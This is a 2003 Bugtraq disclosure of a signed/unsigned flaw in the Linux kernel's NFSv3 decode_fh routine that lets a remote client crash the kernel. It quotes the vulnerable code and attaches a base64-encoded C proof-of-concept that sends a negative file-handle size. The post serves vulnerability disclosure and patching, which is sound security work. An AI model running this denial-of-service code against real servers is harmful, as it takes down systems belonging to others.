Date: Tue, 29 Jul 2003 12:55:34 -0700 (PDT) From: Jared Stanbrough X-X-Sender: jareds@gere.odin.pdx.edu To: bugtraq@securityfocus.com Subject: Remote Linux Kernel < 2.4.21 DoS in XDR routine. ---559023410-758783491-1059444170=:12158 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Content-ID: Hello all, I have discovered a signed/unsigned issue in a routine responsible for demarshalling XDR data for NFSv3 procedure calls. As far as I can tell, this bug has existed since NFSv3 support was integrated. It has been silently fixed in 2.4.21. The bug is in the decode_fh routine of fs/nfsd/nfs3xdr.c under the kernel source tree. Vulnerable code: static inline u32 * decode_fh(u32 *p, struct svc_fh *fhp) { int size; fh_init(fhp, NFS3_FHSIZE); size = ntohl(*p++); if (size > NFS3_FHSIZE) return NULL; memcpy(&fhp->fh_handle.fh_base, p, size); fhp->fh_handle.fh_size = size; return p + XDR_QUADLEN(size); } Where p is a packet of attacker controlled XDR data. If size is made to be negative, the sanity check is passed and the malicious value is passed to memcpy. Due to the behavior of the kernel's memcpy, this will cause a very large copy in kernel space, resulting in an instant kernel panic. The attached code is a POC of this vulnerability. It requires that the vulnerable host has an exported directory available to the attacker. This is probably not the only way to manifest this bug, however. If you have any questions, please feel free to contact me. Cheers, Jared Stanbrough ---559023410-758783491-1059444170=:12158 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII; NAME="knfsd_dos.c" Content-Transfer-Encoding: BASE64 Content-ID: Content-Description: Content-Disposition: ATTACHMENT; FILENAME="knfsd_dos.c" LyoNCiAgTGludXggMi40Lngga25mc2Qga2VybmVsIHNpZ25lZC91bnNpZ25l ZCBkZWNvZGVfZmggRG9TDQogIEF1dGhvcjogamFyZWQgc3RhbmJyb3VnaCA8 amFyZWRzQHBkeC5lZHU+IA0KICBEYXRlOiAwNy8xOS8yMDAzDQogIA0KICBW dWxuZXJhYmxlIGNvZGU6IChmcy9uZnNkL25mczN4ZHIuYyBsaW5lIDUyLTY0 KQ0KDQogIHN0YXRpYyBpbmxpbmUgdTMyICoNCiAgZGVjb2RlX2ZoKHUzMiAq cCwgc3RydWN0IHN2Y19maCAqZmhwKQ0KICB7DQogICAgICAgIGludCBzaXpl Ow0KICAgICAgICBmaF9pbml0KGZocCwgTkZTM19GSFNJWkUpOw0KICAgICAg ICBzaXplID0gbnRvaGwoKnArKyk7DQogICAgICAgIGlmIChzaXplID4gTkZT M19GSFNJWkUpDQogICAgICAgICAgICAgICAgcmV0dXJuIE5VTEw7ICAgDQoN CiAgICAgICAgbWVtY3B5KCZmaHAtPmZoX2hhbmRsZS5maF9iYXNlLCBwLCBz aXplKTsNCiAgICAgICAgZmhwLT5maF9oYW5kbGUuZmhfc2l6ZSA9IHNpemU7 DQogICAgICAgIHJldHVybiBwICsgWERSX1FVQURMRU4oc2l6ZSk7DQogIH0N Cg0KICBUaGlzIGNvZGUgaXMgY2FsbGVkIGJ5IHF1aXRlIGEgZmV3IFhEUiBk ZWNvZGluZyByb3V0aW5lcy4gVGhlIGJlbG93DQogIFBPQyBkZW1vbnN0cmF0 ZXMgdGhlIHZ1bG5lcmFiaWxpdHkgYnkgZW5jb2RpbmcgYSBtYWxpY2lvdXMg ZmhzaXplDQogIGF0IHRoZSBiZWdpbm5pbmcgb2YgYSBkaXJvcGFyZyB4ZHIg YXJndW1lbnQuIA0KIA0KICBUbyB0ZXN0IHRoaXMsIHRoZSB2dWxuZXJhYmxl IGhvc3QgbXVzdCBoYXZlIGFuIGFjY2Vzc2libGUgZXhwb3J0ZWQNCiAgZGly ZWN0b3J5IHdoaWNoIHdhcyBwcmV2aW91c2x5IG1vdW50ZWQgYnkgdGhlIGF0 dGFja2VyLiBfSE9XRVZFUl8gDQogIGl0IG1heSBiZSBwb3NzaWJsZSB0byB0 cmlnZ2VyIHRoaXMgYnVnIGJ5IHNvbWUgb3RoZXIgbWV0aG9kLg0KDQogIEZp eDogU2ltcGx5IGNoYW5nZSBzaXplIHRvIGFuIHVuc2lnbmVkIGludCwgb3Ig Y2hlY2sgZm9yIHNpemUgPCAwLg0KKi8NCg0KI2luY2x1ZGUgPHJwY3N2Yy9u ZnNfcHJvdC5oPg0KI2luY2x1ZGUgPHJwYy9ycGMuaD4NCiNpbmNsdWRlIDxy cGMveGRyLmg+DQojaW5jbHVkZSA8bmV0aW5ldC9pbi5oPg0KI2luY2x1ZGUg PHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4NCg0KI2Rl ZmluZSBORlNQUk9HIDEwMDAwMw0KI2RlZmluZSBORlNWRVJTIDMNCiNkZWZp bmUgTkZTUFJPQ19HRVRBVFRSIDENCg0Kc3RhdGljIHN0cnVjdCBkaXJvcGFy Z3MgaGVoOw0KDQpib29sX3QgeGRyX2hlaChYRFIgKnhkcnMsIGRpcm9wYXJn cyAqaGVoKSANCnsNCiAgaW50MzJfdCB3ZXJkID0gLTE7IA0KICByZXR1cm4g eGRyX2ludDMyX3QoeGRycywgJndlcmQpOw0KfQ0KDQppbnQgbWFpbih2b2lk KQ0Kew0KICBDTElFTlQgKiBjbGllbnQ7DQogIHN0cnVjdCB0aW1ldmFsIHR2 Ow0KDQogIGNsaWVudCA9IGNsbnRfY3JlYXRlKCJtYXJkdWsiLCBORlNQUk9H LCBORlNWRVJTLCAidWRwIik7DQogIA0KICBpZihjbGllbnQgPT0gTlVMTCkg ew0KICAgICAgcGVycm9yKCJjbG50X2NyZWF0ZVxuIik7DQogIH0NCg0KICB0 di50dl9zZWMgPSAzOw0KICB0di50dl91c2VjID0gMDsNCiAgY2xpZW50LT5j bF9hdXRoID0gYXV0aHVuaXhfY3JlYXRlX2RlZmF1bHQoKTsNCg0KICBjbG50 X2NhbGwoY2xpZW50LCBORlNQUk9DX0dFVEFUVFIsICh4ZHJwcm9jX3QpIHhk cl9oZWgsIChjaGFyICopJmhlaCwNCiAgICAgICAgICAgICh4ZHJwcm9jX3Qp IHhkcl92b2lkLCBOVUxMLCB0dik7DQoNCiAgcmV0dXJuIDA7DQp9DQogIA0K IA0K ---559023410-758783491-1059444170=:12158--